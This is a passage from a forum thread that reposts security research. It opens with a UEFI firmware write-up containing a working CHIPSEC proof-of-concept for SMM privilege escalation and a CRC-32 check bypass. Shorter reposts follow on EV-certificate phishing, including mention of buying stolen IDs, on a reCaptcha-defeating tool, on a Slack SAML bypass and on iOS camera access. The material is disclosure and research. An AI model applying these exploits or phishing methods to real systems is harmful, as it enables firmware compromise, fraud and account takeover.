0xbd4929bc, image = SmiFlash * 0xbd497410: SMI = 0x35, addr = 0xbd48fe24, image = TcgSmm 0xbd472f10: SMI = 0x31, addr = 0xbd474ca8, image = UsbRtSmm 0xbd472b10: SMI = 0xbf, addr = 0xbd46ea48, image = CrbSmi 0xbd472710: SMI = 0x01, addr = 0xbd46d5e0, image = PiSmmCommunicationSmm 0xbd472010: SMI = 0x50, addr = 0xbd4671d4, image = SmbiosDmiEdit 0xbd465f10: SMI = 0x51, addr = 0xbd4671d4, image = SmbiosDmiEdit 0xbd465e10: SMI = 0x52, addr = 0xbd4671d4, image = SmbiosDmiEdit 0xbd465d10: SMI = 0x53, addr = 0xbd4671d4, image = SmbiosDmiEdit The data the script provides can also be used to find out memory addresses of the loaded SMM drivers. With this information, we can reverse-engineer the firmware modules mentioned above. Detecting Software SMI handler vulnerability According to the report compiled by the âsmram_parse.pyâ, the UsbRtSmm module contains the implementation of the SW SMI handler #0x31. In this kind of a situation, it is possible to use the UEFITool utility to extract the body of the UsbRtSmm (see Fig. 7). Fig. 7. Extracting UsbRtSmm body In case of IDA Pro, it is possible to save much time by using the ida-efitools script that helps to reverse engineer UEFI firmwares. The script will attempt to automatically define all the used UEFI structures and mark them in idb. The UsbRtSmm module is located at 0xBD473000, and the SW SMI handler (aka DispatchFunction) at 0xbd474ca8. Analysis of DispatchFunction provides the following information: __int64 DispatchFunction() { __int64 v0; // rbx@1 unsigned __int8 *v1; // rdi@1 unsigned __int8 v2; // al@7 v0 = qword_BD48B460; v1 = *(unsigned __int8 **)(qword_BD48B460 + 30392); if ( v1 ) { *(_QWORD *)(qword_BD48B460 + 30392) = 0i64; } else { if ( *(_BYTE *)(qword_BD48B460 + 8) & 0x10 ) return 0i64; v1 = (unsigned __int8 *)*(_DWORD *)(16 * (unsigned int)v40E + 260); if ( sub_BD48AE24((__int64)v1) < 0 ) return 0i64; *(_BYTE *)(v0 + 31477) = 1; } if ( !v1 ) return 0i64; v2 = *v1; if ( !*v1 ) goto LABEL_11; if ( v2 >= 0x20u && v2 <= 0x38u ) { v2 -= 31; LABEL_11: ((void (__fastcall *)(unsigned __int8 *))off_BD473E30[(unsigned __int64)v2])(v1); v0 = qword_BD48B460; } if ( !*(_QWORD *)(v0 + 30392) ) *(_BYTE *)(v0 + 31477) = 0; return 0i64; } As it is evident, DispatchFunction operates with the qword_BD48B460 pointer, the value of which is unknown during static analysis. In addition, there is some structure participating in the logic. The pointer to the structure can be found by computing [16 * [0x40e] + 260]. The 0x40e memory address (stores segment address of Extended BIOS Data Area) may be easily controlled by a user with kernel level privileges. All in all, the structure can be described as user controlled input. The sub_BD48AE24 function checks whether the acquired pointer intercepts the SMRAM region, and exits from the handler if the pointer does. It can also be seen that the first byte of the obtained structure is a number of a called subfunction. The total amount of these subfunctions is equal to 24. The most interesting one among them is the subfunction 14, located at 0xBD4760AC (for ease of analysis we called it subfunc_14): int __fastcall subfunc_14(__int64 a1) { __int64 v2; // rax@1 LODWORD(v2) = sub_BD475F9C( *(200 * ((*(a1 + 11) - 16) >> 4) + qword_BD48B460 + 112 + 8i64 * *(a1 + 1) + 8), *(a1 + 3), (*(a1 + 15) + 3) & 0xFFFFFFFC); *(a1 + 2) = 0; *(a1 + 19) = v2; return v2; } The qword_BD48B460 appeared here as well and it is used to acquire another pointer in relation to it. After that, the acquired pointer is transferred to the sub_BD475F9C function. int __fastcall sub_BD475F9C(int (__fastcall *a1)(_QWORD, _QWORD, _QWORD), _QWORD *a2, unsigned int a3) { ... v3 = a3 >> 3; if ( v3 ) { v4 = v3 - 1; if ( v4 ) { v5 = v4 - 1; if ( v5 ) { ... } else { result = (a1)(*a2, a2[1]); } } else { result = (a1)(*a2); } } else { result = (a1)(); } return result; Here is âa little somethingâ from the driver developer: the function calls another one to which the pointer refers. The thing is it can send up to 7 arguments! However, is it possible to control the pointer? In subfunc_14, the pointer is computed in relation to qword_BD48B460. The advantages that dynamic analysis grants help to learn the contents of the function: >>? itp.halt() [SKL_C0_T0] MWAIT C1 B break at 0x10:FFFFF80DCAA31348 in task 0x0040 [SKL_C0_T1] Halt Command break at 0x33:00007FFA8EBB5F84 in task 0x0040 [SKL_C1_T0] MWAIT C1 B break at 0x10:FFFFF80DCAA31348 in task 0x0040 [SKL_C1_T1] MWAIT C1 B break at 0x10:FFFFF80DCAA31348 in task 0x0040 >>> itp.cv.smmentrybreak=1 >>> itp.threads[0].port(0xb2, 0x31) # call SW SMI #0x31 >>> itp.go() >>? [SKL_C0_T0] SMM Entry break at 0xC600:0000000000008000 in task 0x0040 [SKL_C0_T1] SMM Entry break at 0xC680:0000000000008000 in task 0x0040 [SKL_C1_T0] SMM Entry break at 0xC700:0000000000008000 in task 0x0040 [SKL_C1_T1] SMM Entry break at 0xC780:0000000000008000 in task 0x0040 >>? >>> itp.threads[0].br(None, â0xbd474ca8Lâ, âexeâ) # set breakpoint on execution at DispatchFunction >>> itp.threads[0].go() >>? [SKL_C0_T0] Debug register break on instruction execution only at 0x38:00000000BD474CA8 in task 0x0040 [SKL_C0_T1] BreakAll break at 0x38:00000000BD7DC838 in task 0x0040 [SKL_C1_T0] BreakAll break at 0x38:00000000BD7DC834 in task 0x0040 [SKL_C1_T1] BreakAll break at 0x38:00000000BD7DC834 in task 0x0040 >>? >>> itp.threads[0].asm(â$â, 5) # show disassembly listing 0x38:00000000BD474CA8 48895c2408 mov qword ptr [rsp + 0x08], rbx 0x38:00000000BD474CAD 57 push rdi 0x38:00000000BD474CAE 4883ec20 sub rsp, 0x20 0x38:00000000BD474CB2 488b1d574883ec mov rbx, qword ptr [rip - 0x137cb7a9] 0x38:00000000BD474CB9 488bbbb8760000 mov rdi, qword ptr [rbx + 0x000076b8] >>> itp.threads[0].step(None, 4) # step 4 times [SKL_C0_T0] Single STEP break at 0x38:00000000BD474CAD in task 0x0040 [SKL_C0_T0] Single STEP break at 0x38:00000000BD474CAE in task 0x0040 [SKL_C0_T0] Single STEP break at 0x38:00000000BD474CB2 in task 0x0040 [SKL_C0_T0] Single STEP break at 0x38:00000000BD474CB9 in task 0x0040 >>> itp.threads[0].display(ârbxâ) # rbx contains value of âqword_BD48B460â rbx = 0x00000000bcee9000 rbx.ebx = 0xbcee9000 rbx.ebx.bx = 0x9000 rbx.ebx.bx.bl = 0x00 rbx.ebx.bx.bh = 0x90 So, the driver operates with the pointer that is equal to 0xbcee9000. But is it the memory of the SMM? SMRAM covers the range from 0xbd000000 to 0xbd7fffff. In other words, the memory at 0xbcee9000 is not protected. Considering that the driver allows calling pointer stored in volatile memory, there is an opportunity to perform arbitrary code execution in the SMM context. For the sake of completeness, it is necessary to determine how to compute the 0xbcee9000 address from an OS. By analyzing xrefs to qword_BD48B460 it possible to find the exact place where these values are assigned: if ( (gEfiBootServices_4->LocateProtocol(&EFI_USB_PROTOCOL_GUID, 0i64, &EfiUsbProtocol) & 0x8000000000000000ui64) == 0i64 ) { qword_BD48B460 = *(EfiUsbProtocol + 8); *(EfiUsbProtocol + 0x50) = sub_BD4759E8; *(EfiUsbProtocol + 0x58) = sub_BD475CCC; *(EfiUsbProtocol + 0x60) = sub_BD475D74; The pointer in the question (let us call it usb_data) is stored in the EFI_USB_PROTOCOL protocol. Therefore, we need to understand what module registers it. With the help of GUID {2ad8e2d2-2e91-4cd1-95f5-e78fe5ebe316} in UEFITool, we can find the Uhcd module with the following code segment: LODWORD(usb_protocol) = sub_6088(0x90i64, 0x10i64); *(_QWORD *)(usb_protocol + 8) = usb_data; qword_CB58 = usb_protocol; *(_QWORD *)(usb_protocol + 16) = sub_30B4; *(_DWORD *)usb_protocol = âPBSUâ; *(_QWORD *)(usb_protocol + 24) = sub_2E40; *(_QWORD *)(usb_protocol + 32) = sub_2FC8; *(_QWORD *)(usb_protocol + 40) = sub_350C; *(_QWORD *)(usb_protocol + 48) = sub_3524; *(_QWORD *)(usb_protocol + 56) = sub_3524; *(_QWORD *)(usb_protocol + 64) = sub_3524; *(_QWORD *)(usb_protocol + 72) = sub_6448; *(_QWORD *)(usb_protocol + 104) = sub_31F8; *(_QWORD *)(usb_protocol + 112) = sub_63AC; *(_QWORD *)(usb_protocol + 120) = sub_3238; gEfiBootServices_0->InstallProtocolInterface(&v25, &EFI_USB_PROTOCOL_GUID, 0, (void *)usb_protocol); The EFI_USB_PROTOCOL structure has the USBP signature by zero offset. The sub_6088 function helps to identify the exact location of the structure. gEfiBootServices_0->AllocatePages(AllocateMaxAddress, EfiRuntimeServicesData, 0x11ui64, &Memory) Another "little something" from the developer is that the memory of the EfiRuntimeServicesData type is allocated for the structure, which means that the structure is out of the SMRAM region. More precisely, it is located lower than SMRAM, as borne out by the allocation type being equal to AllocateMaxAddress. It is also worth to be mentioned that the EFI_USB_PROTOCOL structure address will be aligned to PAGE_SIZE (0x1000). With all the required vulnerability-related information gathered, by using CHIPSEC, it is possible to write a simple proof-of-concept that will stuck the system with Machine Check Exception. from struct import pack, unpack import chipsec.chipset from chipsec.hal.interrupts import Interrupts PAGE_SIZE = 0x1000 SMI_USB_RUNTIME = 0x31 cs = chipsec.chipset.cs() cs.init(None, True, True) intr = Interrupts(cs) SMRAM = cs.cpu.get_SMRAM()[0] mem_read = cs.helper.read_physical_mem mem_write = cs.helper.write_physical_mem mem_alloc = cs.helper.alloc_physical_mem # locate EFI_USB_PROTOCOL and usb_data in the memory for addr in xrange(SMRAM / PAGE_SIZE - 1, 0, -1): if mem_read(addr * PAGE_SIZE, 4) == âUSBPâ: usb_protocol = addr * PAGE_SIZE usb_data = unpack(â<Qâ, mem_read(addr * PAGE_SIZE + 8, 8))[0] break assert usb_protocol != 0, âcanât find EFI_USB_PROTOCOL structureâ assert usb_data != 0, âusb_data pointer is emptyâ # prepare our structure struct_addr = mem_alloc(PAGE_SIZE, 0xffffffff)[1] mem_write(struct_addr, PAGE_SIZE, â\x00â * PAGE_SIZE) # clean the structure mem_write(struct_addr + 0x0, 1, â\x2dâ) # subfunction number mem_write(struct_addr + 0xb, 1, â\x10â) # arithmetic adjustment # store the pointer to the structure in the EBDA ebda_addr = unpack(â<Hâ, mem_read(0x40e, 2))[0] * 0x10 mem_write(ebda_addr + 0x104, 4, pack(â<Iâ, struct_addr)) # replace the pointer in the usb_data bad_ptr = 0xbaddad func_offset = 0x78 mem_write(usb_data + func_offset, 8, pack(â<Qâ, bad_ptr)) # allow to read the pointer from EBDA x = ord(mem_read(usb_data + 0x8, 1)) & ~0x10 mem_write(usb_data + 0x8, 1, chr(x)) # stuck it! intr.send_SW_SMI(0, SMI_USB_RUNTIME, 0, 0, 0, 0, 0, 0, 0) As can be seen below, it has indeed been calling an incorrect address that has made a system stuck. >>> itp.cv.smmentrybreak=1 >>> itp.go() >>? # running PoC on the target system... >>? [SKL_C0_T0] SMM Entry break at 0xC600:0000000000008000 in task 0x0040 [SKL_C0_T1] SMM Entry break at 0xC680:0000000000008000 in task 0x0040 [SKL_C1_T0] SMM Entry break at 0xC700:0000000000008000 in task 0x0040 [SKL_C1_T1] SMM Entry break at 0xC780:0000000000008000 in task 0x0040 >>? >>> itp.cv.machinecheckbreak=1 >>> itp.go() >>? [SKL_C0_T0] Machine Check break at 0x38:0000000000BADDAD in task 0x0040 [SKL_C0_T1] Machine Check break at 0x38:00000000BD7DC834 in task 0x0040 [SKL_C1_T0] Machine Check break at 0x38:00000000BD7DC834 in task 0x0040 [SKL_C1_T1] Machine Check break at 0x38:00000000BD7DC834 in task 0x0040 >>? Machine Check Exception occurred while the first thread was jumping to 0xBADDAD - the address specified in the proof-of-concept. Impact and Consequences Although a vulnerability in a particular motherboard poses a certain threat, it is not as critical as when this vulnerability is common for different motherboards produced by different vendors. So, it is necessary to define whether other vendors use the same module in their hardware products. It is not necessary to examine other firmwares to do this: the data from the efi-whitelist repository will suffice. A simple list search shows that the vulnerable module is used by all the vendors. Moreover, according to the data we have gathered, GIGABYTE, ASUS, and Dell are vulnerable as well. Intel firmware is of most relevance here because Intel cares for the security of their devices more than others do. We have made a special showcase stand and researched Intel NUC Kit NUC7i3BNH based on Kaby Lake, to see if the Intelâs firmware contains this vulnerability (see Fig. 8). Fig. 8. Showcase stand Exploiting Intel NUC Kit To the moment, the latest firmware version is 0048. Having extracted UsbRtSmm module, we can analyze DispatchFunction. Comparing the module with the same one in GA-Q170M-D3H, it can be concluded that the exploitation paths are almost identical, though with an exception: there is the following code right in the beginning of DispatchFunction: if ( byte_1B158 == 1 ) return 0i64; if ( sub_1A80C(usb_data) < 0 ) { byte_1B159 = 1; byte_1B158 = 1; return 0i64; } It looks like a fix of a kind, but let us not get carried away. First of all, we need to figure out in what cases byte_1B158 takes value 1. Excluding the cases when the byte_1B158 is equated to 1 after the sub_1A80C provides a negative result, it becomes obvious that the sub_5EEC does it unconditionally. There is a single xref of sub_5EEC pointing to the following function: int __fastcall sub_5F1C(EFI_GUID *Protocol, void *Interface, EFI_HANDLE Handle) { signed __int64 v3; // rax@1 char v5; // [sp+20h] [bp-18h]@2 void *acpi_en_dispatch; // [sp+58h] [bp+20h]@1 v3 = Smst->SmmLocateProtocol(&EFI_ACPI_EN_DISPATCH_PROTOCOL_GUID, 0i64, &acpi_en_dispatch); if ( v3 >= 0 ) LODWORD(v3) = (*acpi_en_dispatch)(acpi_en_dispatch, sub_5EEC, &v5); return v3; The function is sent as an argument when a method of an unknown EFI_ACPI_EN_DISPATCH_PROTOCOL is called, which seems to be a callback. In other words, the sub_5EEC function will be called if a certain event occurs. But what is this event? Searching GUID {bd88ec68-ebe4-4f7b-935a-4f666642e75f} shows that the protocol is implemented in the AcpiModeEnable module. The name is quite self-explanatory, isnât it? There is no need to research it - it is obvious that the sub_5EEC is called when the system jumps in the ACPI mode. Unfortunately, in such a case, it will be more difficult to exploit the vulnerability in Windows 10 systems, because, starting from Vista, Windows OS drivers work only in the ACPI mode. Linux, we beg you, come and save us! With Ubuntu 16.10 AMD64 installed we can load the system in non-ACPI mode. To do this, we add acpi=off to the GRUB_CMDLINE_LINUX_DEFAULT parameter. After that, the system will load without ACPI support. The only thing left do is to learn what the sub_1A80C function checks. While researching the function, it was certain that it validates the usb_data structure. The checking algorithm is quite large, but the only check we are interested in is the usb_data + 0x78 address check, which can be seen in the sub_1A2D0 function containing the code segment below: if ( &buffer != (usb_data + 0x70) ) memcpy(&buffer, (usb_data + 0x70), 0x320ui64); if ( &v19 != (usb_data + 0x6B0) ) memcpy(&v19, (usb_data + 0x6B0), 0x150ui64); if ( &v20 != (usb_data + 0x950) ) memcpy(&v20, (usb_data + 0x950), 0x150ui64); if ( &v21 != (usb_data + 0x7188) ) memcpy(&v21, (usb_data + 0x7188), 0x190ui64); The pointer we need here is copied to the internal buffer. After that, we can see the following code in the end of the function: calculate_crc32(&buffer, 0x7A0ui64, &crc_array[2]); calculate_crc32(crc_array, 0xCui64, crc_out); The fix for the vulnerability exploited in GA-Q170M-D3H is found. While the system is loading, the CRC-32 hash of a part of the usb_data structure memory region is being calculated and saved. When the SW SMI is called the hash is recalculated. If the result does not match, the execution will be stopped, and further attempts to execute handler code will be prohibited. Perhaps, the fix does really prevent vulnerability exploitation, but there is one little âbutâ about it: validation algorithm depends heavily on that cryptographic strength of the CRC-32 algorithm that is...close to zero. To spoof CRC-32 hash, we can simply correct 4 consecutive bytes after changing the data we are interested in, by simply using the python script from Project Nayuki. The only thing needed is to adapt its functions to operate with the buffer instead of files. Considering CRC-32 hash saving, we can modify the pointer like this: bad_ptr = 0xbaddad buf_size = 0x10 buffer = mem_read(usb_data + 0x70, buf_size) crc32 = get_buffer_crc32(buffer) # replace the pointer (usb_data + 0x78) buffer = buffer[0:8] + pack(â<Qâ, bad_ptr) # spoofing crc32, first 4 bytes will be modified buffer = modify_buffer_crc32(buffer, 0, crc32) mem_write(usb_data + 0x70, buf_size, buffer) However, as opposed to GA-Q170M-D3H, with Intel NUC7i3BNH an error occurs: AssertionError: usb_data pointer is empty If we return to the Uhcd module (this time to that of the NUC7i3BNH firmware), we can see that one of the functions acts like this: EFI_STATUS __fastcall sub_2CB0(void *a1) { *(_QWORD *)(usb_protocol + 8) = 0i64; return gEfiBootServices_0->CloseEvent(a1); } It looks like a mitigation of a kind. Now, the usb_data structure address should be defined in another way. Back to the place where the usb_data and usb_protocol structures allocation occurred, it is plain clear that in both cases the sub_64D4 function is called. The function takes memory allocation size and address alignment as arguments. Reviewing the function, we found out that memory allocation occurs once via EFI_BOOT_SERVICES.AllocatePages, when the function is called for the first time. Moreover, a total of 0x11 pages of memory is allocated simultaneously. Further calls break this allocation to pieces, according to the alignment. In combination with memory allocation, such a behavior gives an opportunity to locate the usb_data structure address on the basis of the address of usb_protocol. The first allocation to be made is for usb_data (0x7AC8 bytes). After that, an unknown memory space of 0x8000 bytes that requires alignment of 0x1000 bytes is allocated. Finally, usb_protocol gets its allocated memory (0x90 bytes with an alignment of 0x10). Thus, it is possible to subtract 0x10000 from the usb_protocol address to learn the usb_data address structure. Here is the finishing stroke of our proof-of-concept. assert usb_protocol != 0, âcanât find EFI_USB_PROTOCOL structureâ if usb_data == 0: usb_data = usb_protocol - 0x10000 See the full proof-of-concept at: UsbRt SMM Privilege Elevation Conclusion We have managed to detect a highly critical vulnerability that allows privilege escalation up to the System Management Mode. The vulnerability is common for a broad range of platforms because it is the UsbRtSmm module that contains it. Despite certain exceptions, even the newest Intel devices are susceptible to this threat. Moreover, we described the process of bypassing this ârobust protectionâ granted by CRC-32 hash and pseudomitigation. Before we call it a day, here is a lifehack for those hunting 1-days: due to the fact that Intel releases firmware updates specifying security fixes in their changelogs, you can perform binary diffing of firmware modules with those in other vendorsâ firmware. Timeline of Disclosure 07/10/2017 - Vulnerability reported to Intel. The day the Earth stood still they changed their PGP key, so got no answer. 08/21/2017 - Vulnerability reported to Intel, again 08/22/2017 - Intel acknowledges receiving the report 08/23/2017 - Intel says this issue has been fixed 08/28/2017 - Embedi confirms the issue is resolved 10/10/2017 - Intel pulled down its security advisory 10/21/2017 - Embedi presents âUEFI BIOS holes: So Much Magic, Donât Come Insideâ at H2HC in Brazil 10/24/2017 - Blog article posted Sursa: https://embedi.com/blog/uefi-bios-holes-so-much-magic-dont-come-inside
-
- 1
-
-
First part of phishing with EV 13 SEPTEMBER 2017 This post is intended for a technical audience interested in how an EV SSL certificate can be used as an effective phishing device. I won't be held liable if someone uses this post for unlawful intentions. No one was harmed in this demonstration. Let's get on. Extended validation or EV was designed back in the day to be an effective way to prevent phishing but, as we've seen through the years that extended validation has a lot of short comings such as long vetting processes, lack of wildcard support, and many other things. Now I'm going to demonstrate that it is indeed possible to phish with an EV SSL and how easy and straightforward it is to obtain the certificate. View Ryan Hurst's blog post here about the overall positive trust indicators in browsers. First, I needed to think of a name which would be effective for phishing. After some deliberation, I chose the name "Identity Verified" as it would give the illusion to the user that the phishing site is safe. Second, I had to think of a way of getting an EV SSL certificate for the intended name. After some research on the CA/Browser forum site, I found that, in the EV SSL certificate guidelines, section 8.5.2 stipulates that incorporated private entities are allowed to get hold of an EV SSL certificates. With that information in mind, I decided to incorporate a company here in the UK and after some more research, I found that a limited company by guarantee with the limited exemption was the right one but there was one catch; to incorporate a company in the UK, you need to have a verifiable address and valid ID. So what does an attacker do? Well they can purchase a valid stolen ID for a few pounds from the so called "Dark web" and just use, a service address as the address of the company and the director's home. These service addresses can be bought online for next to nothing. Note: This company was made with a legitimate address and ID. Now finally, I began searching for a company to incorporate this new company on my behalf and after a good hour of researching on Google, I found the right one. I won't say the company name here for legal purposes but I will say that the process was incredibly easy to do; no ID check to my knowledge and it costs less than ÂŁ40. It took the next day for the company to be incorporated by Companies House. After all, this was finished, I now had to include a telephone number on a third party database as stipulated in section 11.5.2 of the EV SSL certificate guidelines. I chose Dun and Bradstreet as the third party database as it's extensively used by CAs for third party checking. It was absolutely easy to add the extra information to Dun and Bradstreet database. I only needed to get my Dun and Bradstreet ID and fill in a form with my mobile number as the telephone and after a few days, it was included. I'm ready to get an EV SSL Certificate. I chose Comodo and Symantec for this demonstration as they were that the time of this post the largest CAs in the industry. First, I went to Symantec site and found the 30 days free trial of production use EV SSL Certificate. After filling in all the details required by Symantec and including a 256-bit ECC CSR, I was finished for now until the validation process was completed. After a few days and a bit of pushing the certificate was issued. https://crt.sh/?id=181513189 After the successfully issued from Symantec, I then tried doing the same again from Comodo and it failed at the first hurdle. Richard Smith, who is the head of validation at Comodo felt that the certificate couldn't be issued due to compliance issues. Great job Richard! Now the certificate part is finished, I can now get on with the phishing part of this test and demonstrate how someone could phish with an EV SSL. First I took a copy of both the Google and PayPal sites and then upload them sites onto nothing.org.uk. Now in a real world phish scenario, an attacker would need to also setup a database and etc to capture the data but I didn't need to because this wasn't an actual phishing attempt to capture real users' data. In these screenshots below from Safari in OSX and IOS the chances of a successful phish are extremely high because of the way Safari hides the actual domain when the site is using an EV SSL and in, combination with the company name "Identity Verified" the site looks legitimate and safe. In this screenshot of Google Chrome, the domain name and the company name are clearly separated which can help the user identity if it's indeed a phishing site or not but if someone could get a hold of a short single letter like p.uk for PayPal or g.uk for Google the user would think that the company in question has moved over to smaller domain name and not be concerned. The EV SSL certificate in Firefox. To conclude this post, I think Symantec shouldn't have issued this EV SSL certificate in the first place as the company name was too common and could easily be misconstrued in the browser. If you've got any questions about this post, please contact me here. The final part will be published in the next few days. The final part will go into more detail about the larger problems of phishing. To Symantec: You have my full permission to release all details concerning this certificate issue to the public domain. James James Burton Read more posts by this author. Sursa: https://0.me.uk/ev-phishing/
-
- 1
-
-
uncaptcha Defeating Google's audio reCaptcha system with 85% accuracy. Inspiration Across the Internet, hundreds of thousands of sites rely on Google's reCaptcha system for defense against bots (in fact, Devpost uses reCaptcha when creating a new account). After a Google research team demonstrated a near complete defeat of the text reCaptcha in 2012, the reCaptcha system evolved to rely on audio and image challenges, historically more difficult challenges for automated systems to solve. Google has continually iterated on its design, releasing a newer and more powerful version as recently as just this year. Successfully demonstrating a defeat of this captcha system spells significant vulnerability for hundreds of thousands of popular sites. What it does Our unCaptcha system has attack capabilities written for the audio captcha. Using browser automation software, we can interact with the target website and engage with the captcha, parsing out the necessary elements to begin the attack. We rely primarily on the audio captcha attack - by properly identifying spoken numbers, we can pass the reCaptcha programmatically and fool the site into thinking our bot is a human. Specifically, unCaptcha targets the popular site Reddit by going through the motions of creating a new user, although unCaptcha stops before creating the user to mitigate the impact on Reddit. Sursa: https://github.com/ecthros/uncaptcha
-
- 1
-
-
Slack SAML authentication bypass October 26, 2017 tl;dr I found a severe issue in the Slack's SAML implementation that allowed me to bypass the authentication. This has now been solved by Slack. Introduction IMHO the rule #1 of any bug hunter (note I do not consider myself one of them since I do this really sporadically) is to have a good RSS feed list. In the course of the last years I built a pretty decent one and I try to follow other security experts trying to "steal" some useful tricks. There are many experts in different fields of the security panorama and too many to quote them here (maybe another post). But one of the leading expert (that I follow) on SAML is by far Ioannis Kakavas. Indeed he was able in the last years to find serious vulnerability in the SAML implementation of Microsoft and Github. Usually I am more an "OAuth guy" but since both, SAML and OAuth, are nothing else that grandchildren of Kerberos learning SAML has been in my todo list for long time. The Github incident gave me the final motivation to start learning it. Learning SAML As said I was a kind of SAML-idiot until begin of 2017 but then I decided to learn it a little bit. Of course I started giving a look the the specification, but the best way I learn things is by doing and hopefully breaking. So I downloaded this great Burp extension called SAML Raider (great stuff, it saves so much time, you can edit any assertion on the fly). Then I tried to look if any of the service that routinely I use are SAML compliant. It turns out that many of them are. To name some: Github (but I guess Ioannis already took all the bugs there). So ping next (I actually found this funny JS Github bug giving a look into it, but not pertinent here) Hackerone, I gave a try here but nada, nisba, niente, nicht, niet Slack, Bingo see next section (this is probably meant for Enterprise customers) Slack SAML authentication bypass As said many of the service I use in my routine are SAML aware so I started to poke a bit them. The vulnerability I found is part of the class known as "confused deputy problem". I already talked about it in one of my OAuth blog post (tl;dr this is also why you never want to use OAuth implicit grant flow as authentication mechanism) and is really simple. Basically SAML assertions, between others contains an element called Audience and AudienceRestriction. Quoting Ioannis: The Assertion also contains an AudienceRestriction element that defines that this Assertion is targeted for a specific Service Provider and cannot be used for any other Service Provider. This means that if I present to a ServiceProvider A an assertion meant for ServiceProvider B, then the ServiceProvider A shoud reject it. Well between all other things I tried this very really simple attack against a Slack's SAML endpoint /sso/saml and guess what? It worked !! To be more concrete I used an old and expired (yes the assertion was also expired!!) Github's Assertion I had saved somewhere in my archive that was signed for a subject different than mine (namely the username was not asanso aka me) and I presented to Slack. Slack happily accepted it and I was logged in Slack channel with the username of this old and expired Assertion that was never meant to be a Slack one!!! Wow this is scary.... Well well this look bad enough so I stopped quite immediately and open a ticket on Hackerone.... Disclosure timeline ...here the Slack security team was simply amazing... Thanks guys 02-05-2017 - Reported the issue via Hackerone. 03-05-2017 - Slack confirmed the issue. 26-08-2017 - Slack awarded a 3000$ bounty but still working with the affected customers in order to solve the vulnerability. Hence the ticket was kept open. 26-10-2017 - Slack closed the issue Acknowledgement I would like to thank the Slack security team in particular Max Feldman you guys rock, really!! Well that's all folks. For more SAML trickery follow me on Twitter. Sursa: http://blog.intothesymmetry.com/2017/10/slack-saml-authentication-bypass.html
-
- 2
-
-
iOS Privacy: watch.user - Access both iPhone cameras any time your app is running Oct 25, 2017 | Fork on GitHub Facts Once you grant an app access to your camera, it can access both the front and the back camera record you at any time the app is in the foreground take pictures and videos without telling you upload the pictures/videos it takes immediately run real-time face recognition to detect facial features or expressions Have you ever used a social media app while using the bathroom? đ˝ All without indicating that your phone is recording you and your surrounding, no LEDs, no light or any other kind of indication. Disclaimer This project is a proof of concept and should not be used in production. The goal is to highlight a privacy loophole that can be abused by iOS apps. What can an iOS app do? iOS users often grant camera access to an app soon after they download it (e.g., to add an avatar or send a photo). These apps, like a messaging app or any news-feed-based app, can easily track the users face, take pictures, or live stream the front and back camera, without the userâs consent. Get full access to the front and back camera of an iPhone/iPad any time your app is running in the foreground Use the front and the back camera to know what your user is doing right now and where the user is located based on image data Upload random frames of the video stream to your web service, and run a proper face recognition software, which enables you to Find existing photos of the person on the internet Learn how the user looks like and create a 3d model of the userâs face Live stream their camera onto the internet (e.g. while they sit on the toilet), with the recent innovation around faster internet connections, faster processors and more efficient video codecs itâs hard to detect for the average user Estimate the mood of the user based on what you show in your app (e.g. news feed of your app) Detect if the user is on their phone alone, or watching together with a second person Recording stunning video material from bathrooms around the world, using both the front and the back camera, while the user scrolls through a social feed or plays a game Using the new built-in iOS 11 Vision framework, every developer can very easily parse facial features in real-time like the eyes, mouth, and the face frame How can I protect myself as a user? There are only a few things you can do: The only real safe way to protect yourself is using camera covers: There is many different covers available, find one that looks nice for you, or use a sticky note (for example). You can revoke camera access for all apps, always use the built-in camera app, and use the image picker of each app to select the photo (which will cause you to run into a problem I described with detect.location). To avoid this as well, the best way is to use Copy & Paste to paste the screenshot into your messaging application. If an app has no copy & paste support, youâll have to either expose your image library, or your camera. Itâs interesting that many people cover their camera, including Mark Zuckerberg. Proposal How can the root of the problem be fixed, so we donât have to use camera covers? Offer a way to grant temporary access to the camera (e.g. to take and share one picture with a friend on a messaging app), related to detect.location. Show an icon in the status bar that the camera is active, and force the status bar to be visible whenever an app accesses the camera Add an LED to the iPhoneâs camera (both sides) that canât be worked around by sandboxed apps, which is the elegant solution that the MacBook uses I reported the issue to Apple with rdar://35116272. About the demo I didnât submit the demo to the App Store; however, you can very easily clone the repo and run it on your own device. You first have to take a picture that gets âpostedâ on the fake âsocial networkâ in the app At this point, youâve granted full access to both of your cameras every time the app is running You browse through a news feed After a bit of scrolling, youâll suddenly see pictures of yourself, taken a few seconds ago while you scrolled through the feed You realize youâve been recorded the whole time, and with it, the app ran a face recognition algorithm to detect facial features. You might say Oh, obviously, I never grant camera permissions! However, if youâre using a messaging service, like Messenger, WhatsApp, Telegram or anything else, chances are high you already granted permission to access both your image library (see detect.location) and your camera. You can check which apps have access to your cameras and photo library by going to Settings > Privacy. The full source code is available on GitHub. How does the demo app get access to the camera? Once you take and post one picture or video via a social network app, you grant full access to the camera, and any time the app is running, the app can use the camera. Whatâs the screenshot on the right As part of iOS 11, there is now an easy to use Vision framework, that allows developers to easily track faces. The screenshot shows that itâs possible to get some basic emotions right, so I wrote a very basic mapping of a userâs face to the corresponding emoji as a proof of concept. You can see the highlighted facial features, and the detected emoji at the bottom. Similar projects Iâve worked on whatâs the user doing: Raising awareness of what you can do with a smartphones gyro sensors in web browsers detect.location: An easy way to access the userâs iOS location data without actually having access steal.password: Easily get the userâs Apple ID password, just by asking Special thanks to Soroush, who came up with the initial idea for this write-up. Open on GitHub This project is in no way affiliated with my work and employer, it's a hobby of mine I work on during weekends Sursa: https://krausefx.com/blog/ios-privacy-watchuser-access-both-iphone-cameras-any-time-your-app-is-running
-
- 2
-
-
Race The Web (RTW) Tests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) simultaneously, and then compares the responses from the server for uniqueness. Includes a number of configuration options. UPDATE: Now CI Compatible! Version 2.0.0 now makes it easier than ever to integrate RTW into your continuous integration pipeline (Ă la Jenkins, Travis, or Drone), through the use of an easy to use HTTP API. More information can be found in the Usage section below. Watch The Talk Racing the Web - Hackfest 2016 Usage With configuration file $ race-the-web config.toml API $ race-the-web Sursa: https://github.com/insp3ctre/race-the-web
-
- 4
-
-
-
